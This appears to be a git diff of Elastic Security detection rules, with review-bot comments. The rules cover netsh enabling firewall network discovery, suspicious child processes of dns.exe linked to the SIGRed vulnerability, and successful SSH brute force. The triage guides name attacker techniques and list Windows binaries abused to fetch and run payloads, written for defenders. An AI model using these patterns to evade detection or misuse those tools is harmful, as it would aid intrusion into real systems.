will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.007", + "name": "Double File Extension", + "reference": "https://attack.mitre.org/techniques/T1036/007/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1204", + "name": "User Execution", + "reference": "https://attack.mitre.org/techniques/T1204/", + "subtechnique": [ + { + "id": "T1204.002", + "name": "Malicious File", + "reference": "https://attack.mitre.org/techniques/T1204/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "8b2b3a62-a598-4293-bc14-3d5fa22bb98f_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8b4f0816-6a65-4630-86a6-c21c179c0d09_108.json b/packages/security_detection_engine/kibana/security_rule/8b4f0816-6a65-4630-86a6-c21c179c0d09_108.json new file mode 100644 index 00000000000..742c2d294d8 --- /dev/null 
+++ b/packages/security_detection_engine/kibana/security_rule/8b4f0816-6a65-4630-86a6-c21c179c0d09_108.json 
@@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of the netsh.exe program to enable host discovery via the network. Attackers can use this command-line tool to weaken the host firewall settings.", + "false_positives": [ + "Host Windows Firewall planned system administration changes." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Enable Host Network Discovery via Netsh", + "note": "## Triage and analysis\n\n### Investigating Enable Host Network Discovery via Netsh\n\nThe Windows Defender Firewall is a native component that provides host-based, two-way network traffic filtering for a device and blocks unauthorized network traffic flowing into or out of the local device.\n\nAttackers can enable Network Discovery on the Windows firewall to find other systems present in the same network. Systems with this setting enabled will communicate with other systems using broadcast messages, which can be used to identify targets for lateral movement. This rule looks for the setup of this setting using the netsh utility.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. 
Analysts can dismiss the alert if the Administrator is aware of the activity and there are justifications for this configuration.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Disable Network Discovery:\n - Using netsh: `netsh advfirewall firewall set rule group=\"Network Discovery\" new enable=No`\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\nprocess.name : \"netsh.exe\" and\nprocess.args : (\"firewall\", \"advfirewall\") and process.args : \"group=Network Discovery\" and process.args : \"enable=Yes\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "8b4f0816-6a65-4630-86a6-c21c179c0d09", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents 
will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.004", + "name": "Disable or Modify System Firewall", + "reference": "https://attack.mitre.org/techniques/T1562/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "8b4f0816-6a65-4630-86a6-c21c179c0d09_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8b4f0816-6a65-4630-86a6-c21c179c0d09_109.json b/packages/security_detection_engine/kibana/security_rule/8b4f0816-6a65-4630-86a6-c21c179c0d09_109.json new file mode 100644 index 00000000000..1a48643b712 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/8b4f0816-6a65-4630-86a6-c21c179c0d09_109.json 
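Review bot: The `index` list includes `logs-system.security*` and `logs-windows.*`, but the rule's `required_fields` depend on `process.args` carrying the full netsh command line; Windows Security process-creation events (4688) only include the command line when the "Include command line in process creation events" audit policy is enabled, so on hosts without that policy the rule is silently blind for those sources. This is worth stating in `setup` next to the generic `event.ingested` paragraph, e.g. `Process command-line auditing must be enabled for Security event 4688 sources to populate process.args; without it this rule cannot match on logs-system.security* data.` The same index list and query appear in `8b4f0816-6a65-4630-86a6-c21c179c0d09_109.json` in the next hunk, which only narrows the endpoint pattern to `logs-endpoint.events.process-*`.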
@@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of the netsh.exe program to enable host discovery via the network. Attackers can use this command-line tool to weaken the host firewall settings.", + "false_positives": [ + "Host Windows Firewall planned system administration changes." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Enable Host Network Discovery via Netsh", + "note": "## Triage and analysis\n\n### Investigating Enable Host Network Discovery via Netsh\n\nThe Windows Defender Firewall is a native component that provides host-based, two-way network traffic filtering for a device and blocks unauthorized network traffic flowing into or out of the local device.\n\nAttackers can enable Network Discovery on the Windows firewall to find other systems present in the same network. Systems with this setting enabled will communicate with other systems using broadcast messages, which can be used to identify targets for lateral movement. This rule looks for the setup of this setting using the netsh utility.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. 
Analysts can dismiss the alert if the Administrator is aware of the activity and there are justifications for this configuration.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Disable Network Discovery:\n - Using netsh: `netsh advfirewall firewall set rule group=\"Network Discovery\" new enable=No`\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\nprocess.name : \"netsh.exe\" and\nprocess.args : (\"firewall\", \"advfirewall\") and process.args : \"group=Network Discovery\" and process.args : \"enable=Yes\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "8b4f0816-6a65-4630-86a6-c21c179c0d09", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents 
will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.004", + "name": "Disable or Modify System Firewall", + "reference": "https://attack.mitre.org/techniques/T1562/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "8b4f0816-6a65-4630-86a6-c21c179c0d09_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_109.json b/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_109.json new file mode 100644 index 00000000000..f414665f840 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_109.json 
@@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies an unexpected process spawning from dns.exe, the process responsible for Windows DNS server services, which may indicate activity related to remote code execution or other forms of exploitation.", + "false_positives": [ + "Werfault.exe will legitimately spawn when dns.exe crashes, but the DNS service is very stable and so this is a low occurring event. Denial of Service (DoS) attempts by intentionally crashing the service will also cause werfault.exe to spawn." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Child Process of dns.exe", + "note": "## Triage and analysis\n\n### Investigating Unusual Child Process of dns.exe\n\nSIGRed (CVE-2020-1350) is a wormable, critical vulnerability in the Windows DNS server that affects Windows Server versions 2003 to 2019 and can be triggered by a malicious DNS response. Because the service is running in elevated privileges (SYSTEM), an attacker that successfully exploits it is granted Domain Administrator rights. This can effectively compromise the entire corporate infrastructure.\n\nThis rule looks for unusual children of the `dns.exe` process, which can indicate the exploitation of the SIGRed or a similar remote code execution vulnerability in the DNS server.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes.\n - Any suspicious or abnormal child process spawned from dns.exe should be carefully reviewed and investigated. 
It's impossible to predict what an adversary may deploy as the follow-on process after the exploit, but built-in discovery/enumeration utilities should be top of mind (`whoami.exe`, `netstat.exe`, `systeminfo.exe`, `tasklist.exe`).\n - Built-in Windows programs that contain capabilities used to download and execute additional payloads should also be considered. This is not an exhaustive list, but ideal candidates to start out would be: `mshta.exe`, `powershell.exe`, `regsvr32.exe`, `rundll32.exe`, `wscript.exe`, `wmic.exe`.\n - If a denial-of-service (DoS) exploit is successful and DNS Server service crashes, be mindful of potential child processes related to `werfault.exe` occurring.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the host during the past 48 hours.\n- Check whether the server is vulnerable to CVE-2020-1350.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Reimage the host operating system or restore the compromised server to a clean state.\n- Install the latest patches on systems that run Microsoft DNS Server.\n- Consider the implementation of a patch management system, such as the Windows Server Update Services (WSUS).\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"dns.exe\" and\n not process.name : \"conhost.exe\"\n", + "references": [ + "https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/", + "https://msrc-blog.microsoft.com/2020/07/14/july-2020-security-update-cve-2020-1350-vulnerability-in-windows-domain-name-system-dns-server/", + "https://github.com/maxpl0it/CVE-2020-1350-DoS", + "https://www.elastic.co/security-labs/detection-rules-for-sigred-vulnerability" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 73, + 
"rule_id": "8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1210", + "name": "Exploitation of Remote Services", + "reference": "https://attack.mitre.org/techniques/T1210/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_110.json b/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_110.json new file mode 100644 index 00000000000..f589f2dd3c2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_110.json 
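Review bot: The `false_positives` entry says `werfault.exe` legitimately spawns when dns.exe crashes, but the `query` only excludes `conhost.exe` and the `note` treats a crash-induced `werfault.exe` child as a possible DoS indicator; to an analyst tuning the rule the two texts read as contradictory. Making the intent explicit in `false_positives` would prevent a blanket exception, e.g. `werfault.exe is intentionally not excluded from the query, since a crash of dns.exe may itself indicate a failed or denial-of-service exploit attempt; add an exception only after the crash cause has been confirmed benign.` The next hunk, `8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_110.json`, carries the same `false_positives` and `note` text and would need the same change.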
@@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies an unexpected process spawning from dns.exe, the process responsible for Windows DNS server services, which may indicate activity related to remote code execution or other forms of exploitation.", + "false_positives": [ + "Werfault.exe will legitimately spawn when dns.exe crashes, but the DNS service is very stable and so this is a low occurring event. Denial of Service (DoS) attempts by intentionally crashing the service will also cause werfault.exe to spawn." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Child Process of dns.exe", + "note": "## Triage and analysis\n\n### Investigating Unusual Child Process of dns.exe\n\nSIGRed (CVE-2020-1350) is a wormable, critical vulnerability in the Windows DNS server that affects Windows Server versions 2003 to 2019 and can be triggered by a malicious DNS response. Because the service is running in elevated privileges (SYSTEM), an attacker that successfully exploits it is granted Domain Administrator rights. This can effectively compromise the entire corporate infrastructure.\n\nThis rule looks for unusual children of the `dns.exe` process, which can indicate the exploitation of the SIGRed or a similar remote code execution vulnerability in the DNS server.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes.\n - Any suspicious or abnormal child process spawned from dns.exe should be carefully reviewed and investigated. 
It's impossible to predict what an adversary may deploy as the follow-on process after the exploit, but built-in discovery/enumeration utilities should be top of mind (`whoami.exe`, `netstat.exe`, `systeminfo.exe`, `tasklist.exe`).\n - Built-in Windows programs that contain capabilities used to download and execute additional payloads should also be considered. This is not an exhaustive list, but ideal candidates to start out would be: `mshta.exe`, `powershell.exe`, `regsvr32.exe`, `rundll32.exe`, `wscript.exe`, `wmic.exe`.\n - If a denial-of-service (DoS) exploit is successful and DNS Server service crashes, be mindful of potential child processes related to `werfault.exe` occurring.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the host during the past 48 hours.\n- Check whether the server is vulnerable to CVE-2020-1350.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Reimage the host operating system or restore the compromised server to a clean state.\n- Install the latest patches on systems that run Microsoft DNS Server.\n- Consider the implementation of a patch management system, such as the Windows Server Update Services (WSUS).\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"dns.exe\" and\n not process.name : \"conhost.exe\"\n", + "references": [ + "https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/", + "https://msrc-blog.microsoft.com/2020/07/14/july-2020-security-update-cve-2020-1350-vulnerability-in-windows-domain-name-system-dns-server/", + "https://github.com/maxpl0it/CVE-2020-1350-DoS", + "https://www.elastic.co/security-labs/detection-rules-for-sigred-vulnerability" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 73, + 
"rule_id": "8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1210", + "name": "Exploitation of Remote Services", + "reference": "https://attack.mitre.org/techniques/T1210/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_10.json b/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_10.json new file mode 100644 index 00000000000..3299a128c46 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_10.json 
@@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies multiple SSH login failures followed by a successful one from the same source address. Adversaries can attempt to login into multiple users with a common or known password to gain access to accounts.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-system.auth-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Successful SSH Brute Force Attack", + "note": "## Triage and analysis\n\n### Investigating Potential Successful SSH Brute Force Attack\n\nThe rule identifies consecutive SSH login failures followed by a successful login from the same source IP address to the same target host indicating a successful attempt of brute force password guessing.\n\n#### Possible investigation steps\n\n- Investigate the login failure user name(s).\n- Investigate the source IP address of the failed ssh login attempt(s).\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Infrastructure or availability issue.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Ensure active session(s) on the host(s) are terminated as the attacker could have gained initial access to the system(s).\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by host.id, source.ip, user.name with maxspan=15s\n [authentication where host.os.type == \"linux\" and event.action in (\"ssh_login\", \"user_login\") and\n event.outcome == \"failure\" and source.ip != null and source.ip != \"0.0.0.0\" and source.ip != \"::\" ] with runs=10\n\n [authentication where host.os.type == \"linux\" and event.action in (\"ssh_login\", \"user_login\") and\n event.outcome == \"success\" and source.ip != null and source.ip != \"0.0.0.0\" and source.ip != \"::\" ]\n", + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "8cb84371-d053-4f4f-bce0-c74990e28f28", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Auditbeat\n- Filebeat\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. 
You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n### Filebeat Setup\nFilebeat is a lightweight shipper for forwarding and centralizing log data. Installed as an agent on your servers, Filebeat monitors the log files or locations that you specify, collects log events, and forwards them either to Elasticsearch or Logstash for indexing.\n\n#### The following steps should be executed in order to add the Filebeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/setup-repositories.html).\n- To run Filebeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/running-on-docker.html).\n- To run Filebeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/running-on-kubernetes.html).\n- For quick start information for Filebeat refer to the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/8.11/filebeat-installation-configuration.html).\n- For complete \u201cSetup and Run Filebeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/setting-up-and-running.html).\n\n#### Rule Specific Setup Note\n- This rule requires the \u201cFilebeat System Module\u201d to be enabled.\n- The system module collects and parses logs created by the system logging service of common Unix/Linux based distributions.\n- To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/", + "subtechnique": [ + { + "id": "T1110.001", + "name": "Password Guessing", + "reference": "https://attack.mitre.org/techniques/T1110/001/" + }, + { + "id": "T1110.003", + "name": "Password Spraying", + "reference": 
"https://attack.mitre.org/techniques/T1110/003/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 10 + }, + "id": "8cb84371-d053-4f4f-bce0-c74990e28f28_10", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8d366588-cbd6-43ba-95b4-0971c3f906e5_2.json b/packages/security_detection_engine/kibana/security_rule/8d366588-cbd6-43ba-95b4-0971c3f906e5_2.json new file mode 100644 index 00000000000..4391a737a9c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/8d366588-cbd6-43ba-95b4-0971c3f906e5_2.json 
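Review bot: The `query` in this rule joins the sequence `by host.id, source.ip, user.name`, so the ten failures and the final success must all be for the same account, which contradicts the description ("attempt to login into multiple users with a common or known password") and the T1110.003 Password Spraying subtechnique listed under `threat`. A spray that fails once per account and then succeeds on one of them never accumulates ten consecutive failures for a single `user.name`, so that case is not covered as written. Either drop `user.name` from the join keys (keeping `host.id, source.ip`) if spraying is in scope, or reword the description and remove the T1110.003 entry so the documented coverage matches the sequence. Since this file is a versioned export of the rule, the change presumably belongs in the upstream rule source rather than in this JSON.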
